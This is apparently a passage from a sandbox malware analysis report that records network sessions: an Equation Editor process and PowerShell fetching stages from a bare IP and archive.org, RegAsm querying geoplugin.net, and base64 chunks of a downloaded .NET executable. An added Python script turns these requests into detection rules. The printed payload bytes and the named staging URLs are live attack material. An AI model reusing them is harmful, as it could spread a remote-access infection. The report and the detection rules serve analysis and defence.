                        Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                        Sep 26, 2024 10:33:12.474611044 CEST | 1236 | IN | Data Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                        Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1AVNMVDS1gTN0UDJ1wQN
                        Sep 26, 2024 10:33:12.474647999 CEST | 448 | IN | Data Raw: 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44
                        Data Ascii: xDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj
                        Sep 26, 2024 10:33:12.474682093 CEST | 1236 | IN | Data Raw: 63 44 48 33 51 78 4e 4d 63 44 42 32 77 76 4e 30 62 44 37 32 51 75 4e 63 62 44 31 32 77 73 4e 45 62 44 76 32 51 72 4e 73 61 44 70 32 77 70 4e 55 61 44 6a 32 51 6f 4e 38 5a 44 64 32 77 6d 4e 6b 5a 44 58 32 51 6c 4e 4d 5a 44 52 32 77 6a 4e 30 59 44
                        Data Ascii: cDH3QxNMcDB2wvN0bD72QuNcbD12wsNEbDv2QrNsaDp2wpNUaDj2QoN8ZDd2wmNkZDX2QlNMZDR2wjN0YDL2QiNcYDF2wgNEUD/1QfNsXD51wdNUXDz1QcN8WDt1waNkWDn1QZNMWDh1wXN0VDb1QWNEQD/0QPNsTD50wNNUTDz0QMN8SDt0wKNkSDn0QJNMSDh0wHN0RDb0QGNcRDV0wENERDP0QDNsQDJzg0M8MDMzQyMYMDD
                        Sep 26, 2024 10:33:12.474718094 CEST | 1236 | IN | Data Raw: 67 62 4e 77 57 44 71 31 41 61 4e 59 57 44 6b 31 67 59 4e 41 57 44 65 31 41 58 4e 6f 56 44 59 31 67 56 4e 51 56 44 53 31 41 55 4e 34 55 44 4d 31 67 53 4e 67 55 44 47 31 41 52 4e 49 55 44 41 30 67 50 4e 77 54 44 36 30 41 4f 4e 59 54 44 30 30 67 4d
                        Data Ascii: gbNwWDq1AaNYWDk1gYNAWDe1AXNoVDY1gVNQVDS1AUN4UDM1gSNgUDG1ARNIUDA0gPNwTD60AONYTD00gMNATDu0ALNoSDo0gJNQSDi0AIN4RDc0gGNgRDW0AFNIRDQ0gDNwQDK0ACNYQDE0gANAMD+zA/MoPD4zg9MQPDyzA8M4ODszg6MgODmzA5MIODgzg3MwNDazA2MYNDUzg0MANDOzAzMoMDIzgxMQMDCzAgM4LD8yguM
                        Sep 26, 2024 10:33:12.474751949 CEST | 448 | IN | Data Raw: 4f 44 70 7a 41 36 4d 63 4f 44 6d 7a 51 35 4d 51 4f 44 6a 7a 67 34 4d 45 4f 44 67 7a 77 33 4d 34 4e 44 64 7a 41 33 4d 73 4e 44 61 7a 51 32 4d 67 4e 44 58 7a 67 31 4d 55 4e 44 55 7a 77 30 4d 49 4e 44 52 7a 41 30 4d 38 4d 44 4f 7a 51 7a 4d 77 41 44
                        Data Ascii: ODpzA6McODmzQ5MQODjzg4MEODgzw3M4NDdzA3MsNDazQ2MgNDXzg1MUNDUzw0MINDRzA0M8MDOzQzMwADzwQMM8CDtwwKMkCDnwQJMMCDhwwHM0BDbwQGMcBDVwwEMEBDPwQDMsADJwwBMUADDwQAAAIAoAUAoA8D//Q/Ps/D5/w9PU/Dz/Q8P8+Dt/w6Pk+Dn/Q5PM+Dh/w3P09Db/Q2Pc9DV/w0PE9DP/QzPs8DJ/wxPU8DD
                        Sep 26, 2024 10:33:12.570207119 CEST | 1236 | IN | Data Raw: 59 44 49 32 77 68 4e 59 59 44 46 32 41 68 4e 4d 59 44 41 31 77 66 4e 34 58 44 39 31 41 66 4e 73 58 44 36 31 51 65 4e 67 58 44 33 31 67 64 4e 55 58 44 30 31 77 63 4e 49 58 44 78 31 41 63 4e 38 57 44 75 31 51 62 4e 77 57 44 72 31 67 61 4e 6b 57 44
                        Data Ascii: YDI2whNYYDF2AhNMYDA1wfN4XD91AfNsXD61QeNgXD31gdNUXD01wcNIXDx1AcN8WDu1QbNwWDr1gaNkWDo1wZNYWDl1AZNMWDi1QYNAWDf1gXN0VDc1wWNoVDZ1AWNcVDW1QVNQVDT1gUNEVDQ1wTN4UDN1ATNsUDK1QSNgUDH1gRNUUDE1wQNIUDAAAQAsBQBQCQMsHj4xgdMOHDxxobMwGjpxwZMSGDix4XM0FjaxAWMWFDT
                        Sep 26, 2024 10:33:12.570245028 CEST | 1236 | IN | Data Raw: 41 65 4e 4f 58 44 76 31 6f 61 4e 59 57 44 56 31 41 45 4e 77 54 54 36 30 34 4b 4e 59 53 6a 5a 30 6f 46 4e 72 51 6a 48 7a 41 2b 4d 2f 4f 54 74 7a 49 36 4d 34 4e 7a 62 7a 67 32 4d 6d 4d 7a 48 79 55 75 4d 50 4c 44 75 79 45 72 4d 49 4b 44 67 79 4d 6d
                        Data Ascii: AeNOXDv1oaNYWDV1AENwTT604KNYSjZ0oFNrQjHzA+M/OTtzI6M4Nzbzg2MmMzHyUuMPLDuyErMIKDgyMmMVJjRyYQMsDAAAgHAFAAAAAwPU/jp/k3Pn9zT/YkPJ7jA9sePe3T09QcPD2jd98WPo1TY8QOPZzzu8QJPyxzR8MxOvvD47Y9OPrj864JO4jjk3Q9NGfzs3s6NdejV3k0N1czI2srNZVDo1gZNKWTe1wWNhVTI1wAN
                        Sep 26, 2024 10:33:12.570277929 CEST | 1236 | IN | Data Raw: 53 44 6a 30 73 48 4e 78 52 7a 5a 30 41 47 4e 52 52 7a 53 30 51 45 4e 35 49 54 76 79 49 72 4d 53 46 6a 2b 78 51 66 4d 75 48 7a 32 78 30 63 4d 46 48 6a 72 78 51 61 4d 5a 47 7a 6b 78 34 59 4d 70 46 44 59 78 77 54 4d 30 41 54 39 77 30 4f 4d 73 43 54
                        Data Ascii: SDj0sHNxRzZ0AGNRRzS0QEN5ITvyIrMSFj+xQfMuHz2x0cMFHjrxQaMZGzkx4YMpFDYxwTM0AT9w0OMsCTow4EMIBAAAAKAEAJA/E+PZ/zy/M8P6+Ts/k6Ph+Tm/44P89Dd/g2Pg9zV/40PG9jP/YzPu8TI/UxPN4zz+MqP35DU+okPE5jP+YjPy4zJ+ghPM0z+98ePd3Tu9oaPc2je9UXPw1DX9EVP80zL9QCP1zz18INPNzjw
                        Sep 26, 2024 10:33:12.570312023 CEST | 672 | IN | Data Raw: 34 59 4e 6a 55 54 48 31 63 52 4e 4e 51 54 75 30 55 4b 4e 66 53 54 6a 30 30 45 4e 79 51 44 49 30 38 41 4e 47 4d 44 2f 7a 51 2f 4d 69 50 6a 6d 7a 45 35 4d 2f 4e 44 65 7a 34 67 4d 39 4c 44 2b 79 77 75 4d 6e 4c 44 31 79 67 73 4d 42 4c 6a 71 79 51 70
                        Data Ascii: 4YNjUTH1cRNNQTu0UKNfSTj00ENyQDI08ANGMD/zQ/MiPjmzE5M/NDez4gM9LD+ywuMnLD1ygsMBLjqyQpM+Jzby8jMjIDExkeMTDznw4GMjBDSwQCMIAAAAgLAEADA/YvPf6Tg+MmPe0DN9cSPX0jC8IFPSwDA7M/OovDx7Q5OHuTb7IgOCnzH5owNNYDr2ISNYXzw1kWNWQTCzsyMIID2xcMAAAATAQAIAszY4UxN4fjp3AkN
                        Sep 26, 2024 10:33:12.570382118 CEST | 1236 | IN | Data Raw: 59 69 4d 56 4c 44 7a 79 67 72 4d 63 4a 54 55 79 4d 6b 4d 31 49 44 4b 79 49 52 4d 39 48 6a 32 78 4d 63 4d 75 47 6a 6e 78 41 5a 4d 45 47 44 65 78 6f 57 4d 62 46 54 51 77 55 43 41 41 41 41 54 41 4d 41 77 41 41 41 41 2b 73 71 50 72 30 54 6c 39 34 59
                        Data Ascii: YiMVLDzygrMcJTUyMkM1IDKyIRM9Hj2xMcMuGjnxAZMEGDexoWMbFTQwUCAAAATAMAwAAAA+sqPr0Tl94YPf0DF8cPPHzTt8IIP1xza70HAAAAJAMAsAkjs5gaOelDV5ESOUgjZ44FOVhDG48wN1fTf3E3NMYDa1EVNFVDF14QNHQT+0kNN9STs0AKNFSzd00GNjRzR0MDNLMD8zo+McPzuzs6MmODlxcDMTAAAAwFADAKAAAwP


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        2 | 192.168.2.22 | 49166 | 178.237.33.50 | 80 | 3792 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 26, 2024 10:33:17.545136929 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                        Host: geoplugin.net
                        Cache-Control: no-cache
                        Sep 26, 2024 10:33:18.153397083 CEST | 1170 | IN | HTTP/1.1 200 OK
                        date: Thu, 26 Sep 2024 08:33:18 GMT
                        server: Apache
                        content-length: 962
                        content-type: application/json; charset=utf-8
                        cache-control: public, max-age=300
                        access-control-allow-origin: *
                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                        Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
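Across the HTTP sessions in this report none of the requesting images is a browser: EQNEDT32.EXE (PID 3352) fetches the .tIF from a bare IP address, powershell.exe (PID 3680) fetches RGBV.txt from the same IP and DetahNoteV.txt from archive.org (the HTTPS session listed further down), and RegAsm.exe (PID 3792) asks geoplugin.net for the victim's geolocation. The following is an added example, not code from the report or from Joe Sandbox: it turns those four requests (constructed sample events transcribed from the session tables) into process/destination detections of the kind a detection engineer would derive from this page. The rule names, the LOLBIN and geo-IP service lists and the event field layout are my own.

```python
import ipaddress
import ntpath

# Constructed sample events, one per request in the HTTP/HTTPS session tables.
SAMPLE_EVENTS = [
    {"pid": 3352, "image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "dst_ip": "185.29.10.52", "dst_port": 80, "host": "185.29.10.52",
     "request": "GET /550/makepicturewithgreatthingstobeonline.tIF HTTP/1.1"},
    {"pid": 3680, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "dst_ip": "185.29.10.52", "dst_port": 80, "host": "185.29.10.52",
     "request": "GET /550/RGBV.txt HTTP/1.1"},
    {"pid": 3680, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "dst_ip": "207.241.227.240", "dst_port": 443, "host": "ia600100.us.archive.org",
     "request": "GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1"},
    {"pid": 3792, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "dst_ip": "178.237.33.50", "dst_port": 80, "host": "geoplugin.net",
     "request": "GET /json.gp HTTP/1.1"},
]

# Office helper binaries that have no business speaking HTTP at all (my list).
OFFICE_HELPERS = {"eqnedt32.exe"}
# Signed Windows binaries commonly abused as downloaders or injection hosts (my list).
LOLBINS = {"powershell.exe", "regasm.exe", "regsvcs.exe", "mshta.exe",
           "rundll32.exe", "certutil.exe"}
# Public geo-IP services that RATs query at start-up to profile the victim (my list).
GEOIP_SERVICES = {"geoplugin.net", "ip-api.com", "ipinfo.io"}


def is_ip_literal(host):
    """True when the HTTP Host header is a bare IPv4/IPv6 address, i.e. the
    download needed no DNS name at all."""
    try:
        ipaddress.ip_address(host.strip("[]"))
        return True
    except ValueError:
        return False


def evaluate(event):
    """Return the names of the rules one request triggers (empty list = clean)."""
    image = ntpath.basename(event["image"]).lower()
    host = event["host"].lower()
    hits = []
    if image in OFFICE_HELPERS:
        hits.append("equation_editor_network_connection")
    if image in LOLBINS and event["request"].startswith("GET "):
        hits.append("lolbin_http_download")
    if is_ip_literal(host):
        hits.append("http_host_is_ip_literal")
    if host in GEOIP_SERVICES:
        hits.append("geoip_lookup_from_non_browser")
    return hits


def alerts(events):
    """Map each (pid, image basename) to the sorted set of rules it triggered
    across all of its requests."""
    out = {}
    for ev in events:
        key = (ev["pid"], ntpath.basename(ev["image"]))
        out.setdefault(key, set()).update(evaluate(ev))
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    for key, rules in sorted(alerts(SAMPLE_EVENTS).items()):
        print(key, rules)
```

Every process in the table trips at least two rules, and a browser fetching a normal page trips none, which is the separation you want before wiring this into a SIEM. The Host-is-an-IP-literal rule is the cheapest one here: it needs no allowlist and catches both the Equation Editor and the PowerShell stage on their first request.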


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.22 | 49162 | 207.241.227.240 | 443 | 3680 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-09-26 08:33:09 UTC | 109 | OUT | GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1
                        Host: ia600100.us.archive.org
                        Connection: Keep-Alive
                        2024-09-26 08:33:09 UTC | 606 | IN | HTTP/1.1 200 OK
                        Server: nginx/1.24.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 08:33:09 GMT
                        Content-Type: text/plain; charset=utf-8
                        Content-Length: 2823512
                        Last-Modified: Wed, 11 Sep 2024 23:50:18 GMT
                        Connection: close
                        ETag: "66e22cba-2b1558"
                        Strict-Transport-Security: max-age=15724800
                        Expires: Thu, 26 Sep 2024 14:33:09 GMT
                        Cache-Control: max-age=21600
                        Access-Control-Allow-Origin: *
                        Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                        Access-Control-Allow-Credentials: true
                        Accept-Ranges: bytes
                        2024-09-26 08:33:09 UTC | 15778 | IN | Data Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 42 6f 43 42 62 6f 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 45 59 67 41 41 41 49 41 41 41 41 41 41 41 41 76 6d 55 67 41 41 41 67 41 41 41 41 67 43 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                        Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABoCBboAAAAAAAAAAOAADiELATAAAEYgAAAIAAAAAAAAvmUgAAAgAAAAgCAAAABAAAAgAAAAAgA
                        2024-09-26 08:33:09 UTC | 16384 | IN | Data Raw: 41 41 41 50 34 4d 45 77 42 46 41 67 41 41 41 41 55 41 41 41 41 31 41 41 41 41 4f 41 41 41 41 41 41 41 45 51 4d 52 46 78 45 49 63 35 73 46 41 41 5a 76 63 51 41 41 43 69 41 42 41 41 41 41 66 73 55 49 41 41 52 37 42 51 6b 41 42 44 6e 4a 2f 2f 2f 2f 4a 69 41 41 41 41 41 41 4f 4c 37 2f 2f 2f 38 41 41 4e 30 66 41 41 41 41 49 41 49 41 41 41 42 2b 78 51 67 41 42 48 73 53 43 51 41 45 4f 73 6e 36 2f 2f 38 6d 49 41 41 41 41 41 41 34 76 76 72 2f 2f 78 45 44 62 79 73 41 41 41 6f 57 50 6f 38 41 41 41 41 67 41 51 41 41 41 48 37 46 43 41 41 45 65 77 73 4a 41 41 51 36 6e 66 72 2f 2f 79 59 67 41 51 41 41 41 44 69 53 2b 76 2f 2f 45 67 63 6f 63 41 41 41 43 68 4d 49 49 41 55 41 41 41 42 2b 78 51 67 41 42 48 76 30 43 41 41 45 4f 6e 58 36 2f 2f 38 6d 49 41 59 41 41 41 41 34 61
                        Data Ascii: AAAP4MEwBFAgAAAAUAAAA1AAAAOAAAAAAAEQMRFxEIc5sFAAZvcQAACiABAAAAfsUIAAR7BQkABDnJ////JiAAAAAAOL7///8AAN0fAAAAIAIAAAB+xQgABHsSCQAEOsn6//8mIAAAAAA4vvr//xEDbysAAAoWPo8AAAAgAQAAAH7FCAAEewsJAAQ6nfr//yYgAQAAADiS+v//EgcocAAAChMIIAUAAAB+xQgABHv0CAAEOnX6//8mIAYAAAA4a
                        2024-09-26 08:33:09 UTC | 16384 | IN | Data Raw: 2f 2f 2f 77 41 52 42 47 39 49 49 77 41 47 62 33 51 41 41 41 6f 54 42 53 41 46 41 41 41 41 4f 44 48 2f 2f 2f 38 41 4f 4e 73 41 41 41 41 67 43 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 4d 41 45 55 67 41 41 41 41 4f 51 49 41 41 47 34 43 41 41 42 61 41 51 41 41 66 51 41 41 41 4d 73 43 41 41 43 4d 41 51 41 41 46 41 45 41 41 4a 77 44 41 41 43 55 41 41 41 41 41 51 4d 41 41 4c 77 41 41 41 41 57 41 41 41 41 33 41 49 41 41 4d 63 42 41 41 43 6a 41 51 41 41 53 67 49 41 41 41 55 41 41 41 43 62 41 67 41 41 58 67 41 41 41 49 45 42 41 41 41 38 41 51 41 41 61 77 45 41 41 42 30 44 41 41 44 38 41 41 41 41 66 77 49 41 41 4f 30 42 41 41 44 68 41 41 41 41 53 77 45 41 41 44 51 41 41 41 42 46 41 41 41 41 49 51 41 41 41 42 4d 43 41 41 41 34 4e 41 49 41 41 42 45 49 4f 6a 30 44 41
                        Data Ascii: ///wARBG9IIwAGb3QAAAoTBSAFAAAAODH///8AONsAAAAgCAAAADgEAAAA/gwMAEUgAAAAOQIAAG4CAABaAQAAfQAAAMsCAACMAQAAFAEAAJwDAACUAAAAAQMAALwAAAAWAAAA3AIAAMcBAACjAQAASgIAAAUAAACbAgAAXgAAAIEBAAA8AQAAawEAAB0DAAD8AAAAfwIAAO0BAADhAAAASwEAADQAAABFAAAAIQAAABMCAAA4NAIAABEIOj0DA
                        2024-09-26 08:33:09 UTC | 16384 | IN | Data Raw: 38 52 43 53 68 31 41 67 41 47 62 7a 49 6a 41 41 59 52 43 57 2f 47 49 67 41 47 4b 48 59 43 41 41 5a 76 4d 69 4d 41 42 69 68 30 41 67 41 47 45 77 38 67 43 51 41 41 41 48 37 46 43 41 41 45 65 38 49 49 41 41 51 36 7a 50 37 2f 2f 79 59 67 44 51 41 41 41 44 6a 42 2f 76 2f 2f 45 51 49 54 41 79 41 49 41 41 41 41 2f 67 34 4b 41 44 69 72 2f 76 2f 2f 4f 42 73 42 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 37 4d 49 41 41 51 36 6c 76 37 2f 2f 79 59 67 41 41 41 41 41 44 69 4c 2f 76 2f 2f 45 51 45 67 70 30 47 63 33 79 41 44 41 41 41 41 59 79 42 63 44 35 4f 49 59 58 37 46 43 41 41 45 65 38 51 49 41 41 52 68 4b 46 51 43 41 41 59 6f 59 77 49 41 42 68 4d 43 49 42 34 41 41 41 41 34 56 2f 37 2f 2f 78 45 48 4f 6c 6f 42 41 41 41 67 43 67 41 41 41 48 37 46 43 41 41 45 65
                        Data Ascii: 8RCSh1AgAGbzIjAAYRCW/GIgAGKHYCAAZvMiMABih0AgAGEw8gCQAAAH7FCAAEe8IIAAQ6zP7//yYgDQAAADjB/v//EQITAyAIAAAA/g4KADir/v//OBsBAAAgAAAAAH7FCAAEe7MIAAQ6lv7//yYgAAAAADiL/v//EQEgp0Gc3yADAAAAYyBcD5OIYX7FCAAEe8QIAARhKFQCAAYoYwIABhMCIB4AAAA4V/7//xEHOloBAAAgCgAAAH7FCAAEe
                        2024-09-26 08:33:09 UTC | 16384 | IN | Data Raw: 41 41 4f 4d 37 38 2f 2f 38 52 41 54 6b 71 2f 66 2f 2f 49 41 63 41 41 41 42 2b 78 51 67 41 42 48 76 6b 43 41 41 45 4f 72 50 38 2f 2f 38 6d 49 41 49 41 41 41 41 34 71 50 7a 2f 2f 77 41 41 41 52 41 41 41 41 49 41 71 77 44 35 70 41 46 33 41 41 41 41 41 43 5a 2b 6f 51 41 41 42 42 54 2b 41 53 6f 41 41 42 70 2b 6f 51 41 41 42 43 6f 41 4b 76 34 4a 41 41 42 76 5a 51 41 41 43 69 6f 41 4b 76 34 4a 41 41 42 76 54 51 41 41 43 69 6f 41 4c 67 44 2b 43 51 41 41 4b 50 77 6c 41 41 59 71 4c 67 44 2b 43 51 41 41 4b 4c 45 45 41 41 59 71 4b 76 34 4a 41 41 42 76 2b 51 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 2b 41 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 45 43 4d 41 42 69 6f 41 4c 67 44 2b 43 51 41 41 4b 43 55 42 41 41 6f 71 48 67 41 6f 73 41 51 41 42 69 70 4b 2f 67 6b 41 41
                        Data Ascii: AAOM78//8RATkq/f//IAcAAAB+xQgABHvkCAAEOrP8//8mIAIAAAA4qPz//wAAARAAAAIAqwD5pAF3AAAAACZ+oQAABBT+ASoAABp+oQAABCoAKv4JAABvZQAACioAKv4JAABvTQAACioALgD+CQAAKPwlAAYqLgD+CQAAKLEEAAYqKv4JAABv+QIABioAKv4JAABv+AIABioAKv4JAABvECMABioALgD+CQAAKCUBAAoqHgAosAQABipK/gkAA
                        2024-09-26 08:33:09 UTC | 16384 | IN | Data Raw: 6f 49 41 41 51 36 59 50 2f 2f 2f 79 59 67 43 41 41 41 41 44 68 56 2f 2f 2f 2f 4f 47 30 41 41 41 41 67 42 77 41 41 41 48 37 46 43 41 41 45 65 37 67 49 41 41 51 36 50 50 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 78 2f 2f 2f 2f 41 41 49 6f 43 77 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 75 67 67 41 42 44 6b 57 2f 2f 2f 2f 4a 69 41 42 41 41 41 41 4f 41 76 2f 2f 2f 38 41 49 49 66 62 73 78 73 67 6d 4f 66 75 4f 6c 67 67 64 4f 74 35 55 57 46 2b 78 51 67 41 42 48 73 43 43 51 41 45 59 53 67 37 41 77 41 47 4b 44 77 44 41 41 5a 36 42 47 39 67 41 41 41 4b 46 79 68 76 41 77 41 47 45 77 49 67 42 67 41 41 41 48 37 46 43 41 41 45 65 37 30 49 41 41 51 36 77 66 37 2f 2f 79 59 67 43 51 41 41 41 44 69 32 2f 76 2f 2f 41 41 51 55 2f 67 45 54 41 53 41 44 41 41 41 41 4f
                        Data Ascii: oIAAQ6YP///yYgCAAAADhV////OG0AAAAgBwAAAH7FCAAEe7gIAAQ6PP///yYgBAAAADgx////AAIoCwMABiACAAAAfsUIAAR7uggABDkW////JiABAAAAOAv///8AIIfbsxsgmOfuOlggdOt5UWF+xQgABHsCCQAEYSg7AwAGKDwDAAZ6BG9gAAAKFyhvAwAGEwIgBgAAAH7FCAAEe70IAAQ6wf7//yYgCQAAADi2/v//AAQU/gETASADAAAAO
                        2024-09-26 08:33:09 UTC | 16384 | IN | Data Raw: 41 41 4f 4b 37 2f 2f 2f 38 52 41 44 70 2f 41 41 41 41 49 41 51 41 41 41 41 34 6e 66 2f 2f 2f 78 45 43 4f 71 49 41 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 38 4d 49 41 41 51 36 67 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 68 33 2f 2f 2f 2f 41 41 49 6f 70 41 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 76 67 67 41 42 44 70 63 2f 2f 2f 2f 4a 69 41 44 41 41 41 41 4f 46 48 2f 2f 2f 38 41 4b 67 41 44 46 43 69 79 41 77 41 47 45 77 41 67 42 51 41 41 41 44 67 37 2f 2f 2f 2f 4f 44 41 41 41 41 41 67 43 41 41 41 41 50 34 4f 41 51 41 34 4a 50 2f 2f 2f 77 41 67 4a 47 76 43 36 53 41 58 47 50 4f 77 59 58 37 46 43 41 41 45 65 38 41 49 41 41 52 68 4b 4b 30 44 41 41 59 6f 73 51 51 41 42 6e 6f 43 65 37 4d 41 41 41 51 54 41 69 41 48 41 41 41 41 4f 50 54 2b 2f
